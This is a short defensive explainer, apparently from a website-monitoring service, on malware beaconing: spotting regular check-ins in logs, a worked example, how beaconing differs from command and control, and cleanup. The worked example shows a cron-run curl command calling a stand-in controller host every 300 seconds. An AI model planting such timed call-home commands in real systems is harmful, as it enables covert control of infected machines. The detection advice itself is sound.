Malware

Beaconing

Beaconing is infected software contacting its controller at regular intervals to say it is alive and ask for orders. The regularity is the tell: real browsing is messy, a beacon is a metronome.

How it is measured

Look at outbound connection logs for one host, one destination, and near-identical timing. A request every 60 seconds with a 5 to 15 percent jitter, same small payload size, same user agent, is the classic shape. Network monitors and EDR tools compute this by bucketing intervals and flagging low variance.

On a website you can see it from the other side: an injected script that calls `fetch()` on a timer to a strange domain. Count how many times the page hits that host per minute with the tab idle.

Worked example

A small-business server has a cron-launched script that runs `curl -s http://update-check.example-cdn.top/p?id=7731` every 300 seconds. The firewall log shows 288 identical outbound requests per day, each 214 bytes, with no dip on weekends. No human browses that way at 3 a.m.

After an admin blocks the host at the firewall, the script keeps trying, and the log now shows 288 refused connections a day. That count confirms the infection is still running even though the beacon no longer lands.

How it differs

Beaconing is the check-in. C2 (command and control) is the server and channel on the other end that answers it. The beacon is traffic you can see and measure. The C2 is the infrastructure that decides what the infected machine does next, so blocking only one does not clean the host.

Common errors

Looking only at volume, since a beacon is tiny. Assuming HTTPS means it is legitimate. Missing jitter and concluding the timing is random. Blocking the destination and declaring victory without finding the process that sends it. Whitelisting a destination because it sits on a big cloud provider.

In practice

Pick one quiet host and graph outbound connections per destination for a day. Anything that repeats at fixed intervals to a domain nobody can explain gets traced to a process, not just blocked. Find the cron entry, service, or injected script that makes the call and remove it.

See also

Command and control, Botnet

Sources

Count this on a real site.

Watch my website